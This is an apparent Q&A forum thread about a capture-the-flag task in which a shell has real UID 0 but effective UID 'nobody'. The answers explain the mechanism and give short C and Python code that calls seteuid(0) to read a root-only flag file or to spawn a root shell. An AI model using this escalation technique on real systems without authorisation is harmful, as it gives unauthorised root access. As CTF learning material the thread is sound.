2

I'm participating in a capture-the-flag contest where I must implement some form of privilege escalation to read the flag.txt file. I've noticed that when I run whoami I get the following result:

myHostHere:/$ whoami
nobody

But when I run id my UID is set to root:

myHostHere:/$ id
uid=0(root) gid=65534(nobody) euid=65534(nobody)

Does this mean it's possible for me to act as a root user, etc or am I misinterpreting the output?

Edit:

The output of ls -l flag.txt is as follows:

-r--r-----    1 root     root            34 Feb 10 12:00 flag.txt

2 Answers2

1

This can be solved by writing and compiling (with --static) a C program like so on a separate machine:

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
void main() {
    seteuid(0);
    setgid(0);
    system("cat flag.txt");
}

This file can be copied over to the CTF machine, given permission to execute with chmod +x, and run from the tmp folder.

0

I created a setup very similar to yours. I did it with a debugger (examples: here and there). In the affected shell I have:

$ whoami
nobody
$ id
uid=0(root) gid=65534(nogroup) euid=65534(nobody) groups=65534(nogroup)
$

Then, according to this answer:

File access, and operations that require root privileges, look at the effective UID and GID.

Indeed, this is what happens:

$ ls -l flag.txt
---------- 1 root root 4 Mar 17 08:57 flag.txt
$ cat flag.txt
cat: flag.txt: Permission denied
$

But I can do this:

$ sudo cat flag.txt
foo

Or this:

$ su -
# whoami
root
# cat flag.txt
foo

Or this:

$ sg root 'cat flag.txt'
foo

When you have uid=0, anything that can use seteuid system call and then read the file can help you. E.g. python:

import os
os.seteuid(0)
f = open('flag.txt', 'r')
print f.read()
f.close()

Instead of (or aside of) reading the file you can spawn an elevated shell:

import os
os.seteuid(0)
os.execve("/bin/sh", [], {})

In this shell you're root; cat flag.txt will work.

Testbed: Debian GNU/Linux 9.

Kamil Maciorowski
  • 81,893